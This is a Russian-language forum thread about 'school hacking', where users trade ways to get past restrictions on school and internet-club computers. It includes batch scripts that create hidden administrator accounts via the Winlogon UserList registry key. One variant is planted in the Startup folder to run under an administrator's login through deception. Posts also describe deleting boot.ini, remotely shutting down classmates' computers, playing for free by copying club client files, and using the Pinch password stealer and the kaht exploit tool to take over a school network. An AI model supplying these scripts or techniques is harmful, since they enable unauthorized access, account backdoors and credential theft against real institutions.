Школьный хакинг

[Winux]

Есть такая область хакинга как Школьный (school hacking).
Это такая область, увеличения привилегий пользователя в школьных компьютерных классах и нет клубах. Думаю все представили себе обстановку.

Итак, первые хинты внесу в коллекцию:

1) Разлочивание CMD, заблоченной админом
Просто создаем батник и суем туда 1 строку:

command.com

Запускаем и Ура, командная строка теперь доступна!

2) Разлочка залоченного жесткого диска
В старых виндах 95 и 98 (а именно такие стоят в большинстве школ) такая залочка вовле не залоччка. Чтоб туда попасть можно прсто создать где-нить ссылку на драйв C вида:

<a href=c:\>Попасть на жесткий диск</a>

Сохраняем в HTML и заходим


Как видите. все на редкость тупо, однако дает возможность поиметь в школьной локалке больше чем положено.
Серьезные люди могут меня не осмеивать за эту тему, так как к хакингу это относится по части юмора.

 

[k00mar.bzz]

Больше всего обожал в школе удалять с компа всю инфу из фаила boot.ini

 

[Sparrow]

Проделал штуку чтоб попасть на жесткий диск у себя. Мну спалил информатик, сказал что я совершил старшную полому и занизил мне оценку в четверти. :cry2: :cry2: :cry2: :cry2:

 

[ammok]

2 Winux
У меня в инет клубе так даже делать не надо - все открыто, но бесплатно никто не может посидеть, я мог бы написать статью "Как защитить интернет клуб от хакеров и вандалов"

2 k00mar.bzz
если винда ХР, то она загрузится

З.Ы. взломать проще чем настроить и защитить...

 

[k00mar.bzz]

2ammok там не ХР, если бы был ХР, то я не стал бы писать )

 

[SovaEnd]

Что ты школы обижаешь!
У меня в школе пингвин+2000+хр+мс-дос.
И все что ты написал в 444 не пройдет.Из школы выгонят.

 

[Sigizmud VII]

SovaEnd
У нас за такое вобще не чё не сделают!
Причём стоит всё тоже!

 

[ho0k]

del

 

[Sigizmud VII]

ho0k
У меня случай был, когда у нас урок химии проходил в кабенете информатики.
Все сидели за компами и рисовали презентации в поинте. Я как раз в тот день принёс lan shutdown И вот разгар урока, и я вырубаю комп соседа Училка в удивлении кричит, что же это такое?? Опять вырубился??? Тут подхожу я, делаю вид что смотрю комп, в тот момент мой друг опять его вырубил и я сказал что это чернобольский вирус, на что училка сразу купилась, заставила всех вырубить компы и разрешила идти домой т.к был последний урок

 

[ho0k]

del

 

[Civil-nix]

К винту еще добратся можно из браузера если написать в адрессной строке c://
Иногда бывает, что браузера на рабочем столе нет и в пуске тоже.
Тогда встает задача как добраться до браузера. Если это игровой клуб то надо найти игрушку которая имеет доступ к своему вебресурсу (например О счастливчик) , нажимаем перейти на страницу и открывается браузер, а дальше с:// . Если немного подумать то можно добраться и до сетевого окружения.
И если есть свободный доступ к сераку (Очень часто так бывает), если это игровой салон), то можно найти в дистрибутиве Локер (или как там эта прога для установки времени и трафика на машинах называется?) и установить у себя.
И опля можно самому админить игровой салон, т.е включать машины и отключать.
Можно еще по другому бесплатно поиграть: После окончания времени нажать ктрл + альт + дел и выполнить задачу! Найти файл запуска игры и запустить! Проверено на Win xp , правда почему то не на всех машинах идет и не все игры!
Еще способ бесплатно поиграть: Узнать на какой машине взяли время дофига, потом выше перечисленными способами залесть к нему . Там есть клиент серверной части проги. Найти файлик (какой именно ищите сами =) ) и скопировать себе. Все ваша машина уже не ваша а соседа, то есть одинаковые иденты (например комп №5) соответствено и время у вас одинаковое будет!
Еще я знаю около десяти способов поиграть бесплатно. Но ищите сами и найдете.

А про школьные взломы вот история:
Ког да то давно я учился в институте, хакать я неумел тогда, но нам всегда хотелось поиграть в контру по сети или еще во что нибудь! А при запуске винда ругалась что нельзя! И тогда мы пропалили такую фишку . Если файл переименовать в calc.exe (Файл запуска калькулятора) то все запускалось ок! Не знаю каким макаром админ настраивал все это дело ! Но это имхо большой ЛОЛ ! ease:

 

[mByte]

Хы, это что это за школы, в которых стоят 98-ые винды? Я вот недавно в школу свою бывшую ходил, в класс информатики, и там на тачках стоят Fedora Core 4, а на учительской FreeBSD 5.4 stable. Вот и хотелось бы узнать, как школьникам поломать такую штуку и зайти на диск C:

Если серьезно, то не видел даже, чтобы где-то в школах или универах стояли 98-е, только хрюшки или линухи, типа аспа и федоры.

 

[Lamer]

А мы все по простому делали мы делали Print Screen потом прятали нижнию панельку... забыл как она называется и ставили на рабочий стол обои из принт скрина..., потом все ярлыки удалялись, и преподы тчетно пытались нажать на Мой компьютер и тому подобные вещи никакого хака, и поржать можно немного, пока до препода дойдет что это рисунок ;-)

 

[Winux]

в школу свою бывшую ходил, в класс информатики, и там на тачках стоят Fedora Core 4, а на учительской FreeBSD 5.4 stable.

ЛОЛ, это не школа в правонарушитель какойто. Программа обучения в школе учреждена для всех и в нее входит:
- Обучение в ОС Виндоз и встроенные программы: сеанс МС дос, блокнот, паинт
- МС Офис (Ворд, Ексел, Поувер поинт)
- Турбо паскали и мелкие навыки програмирования
- Теория: что такое информатика и нах она в школе

ВСЕ. Больше в школе не имеют права преподавать ничего. И ничего не имеют права пропустить.
Даже если у тя школа какая-то особенная, например с комп уклоном, то это разговор другой. Хотя у нас, что ученики, что училка в винде ОЧЕНЬ многого не знали.

 

[mByte]

Хз, скаким там счас уклоном школа, раньше просто интернат был. А по поводу мсдос и виндовз и больше ничего не имеют права преподавать - это фигня, имеют, виндовз - это обязательная программа.

 

[Roach]

Для тех кто хочет создать скрытую учетку:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\ добавить ключ типа REG_DWORD соответствующий имени пользователя. Присвоив этому ключу значение 1 мы разрешим показывать этого пользователя в Welcome Screen, а 0 запретим. Несмотря на то что пользователя не видно, им всё равно можно залогиниться. Для этого дважды нажимаем Crtl+Alt+Del, открывается классическое окно логона, вводим имя, пароль, и логинимся.
Один из недостатков:
Видно папку юзера в Documents and Settings, хотя может можно будет ее переименовать или скрыть=)

 

[Winux]

Автоматизация процесса создания скрытого юзера:

   cls
:b
echo                         User Adding Script by
echo                        .......................
echo                        Syed Shoaib Ali Jaffery
set /p u=UserName:-
set /p p=Password:-
echo                        Choose Group to add user
echo                        Press 0 for USERS Group
echo                        Press 1 for Adminstrators Group
set /p s=Your Choice:-
if %s% equ 0 set m=users
if %s% equ 1 set m=administrators
if %s% geq 2 goto a
if %s% lss 0 goto a
net user %u% %p% /add && net localgroup %m% %u% /add
echo Windows Registry Editor Version 5.00> c:\SPOILER.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\M*cf*t\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\SPOILER.reg
echo "%u%"=dword:00000000>> c:\SPOILER.reg
REGEDIT /S c:\SPOILER.REG
DEL /Q c:\SPOILER.REG
attrib +r +a +s +h %SystemDrive%\docume~1\%u%
goto c
:a
echo                        You must enter valid value for Group
pause
goto b
:c
Exit

Это пихаем в батник и пускаем.

 

[ammok]

2 Winux
Подобные батники я нахожу постоянно в папках пользователей, наивые люди думают что это прокатит под ограниченной учеткой

Лучше такой, точнее переписанный батник (внизу написсан код) засунуть в папку "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" (в английской винде) и наплести админу что че-то косячет, когда он войдет под учетку, добавится пользователь.

@echo off
cls
net user ammok password /add && net localgroup administrators ammok /add
echo Windows Registry Editor Version 5.00 > c:\SPOILER.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> c:\SPOILER.reg
echo "ammok"=dword:00000000 >> c:\SPOILER.reg
REGEDIT /S c:\SPOILER.REG
DEL /Q c:\SPOILER.REG
attrib +r +a +s +h %SystemDrive%\docume~1\ammok
Exit

 

[Spawn™]

День добрый...


надо на админскую тачку в институте закинуть пинч... как это можно сделать...
на тачке стоит Радмин...
на клиентской тачке есть доступ к СМД...




К разговору по поводу создания учётной записи... а если реально её создать , чтобы она была с правами администратора... потом закинуть на диск С к админам пинч... и самому запустить его.. но так чтобы он выслал пассы с их тачки...


а если запустить пинч на клиенте... он пасы пришлёт с кого?
с клиента? или админа?

 

[lucifer]

а я вот kaht3 принёс, загрузился с вопикса, и всё на всех 100компах у меня был шелл при помощи пинча и ни каких учёток не прятал, ни куды ни чё не добавлял, так сказать был master of school +)
Добавлено в [time]1138974317[/time]
конечно kaht для кидисов, но чё такщить навороченную базу сполитов целиком? там сеть ни как не защина и управляется при помощи вынь2ксерв, а toq хотел ботнт создать но увы, инета там нету только на 2 компах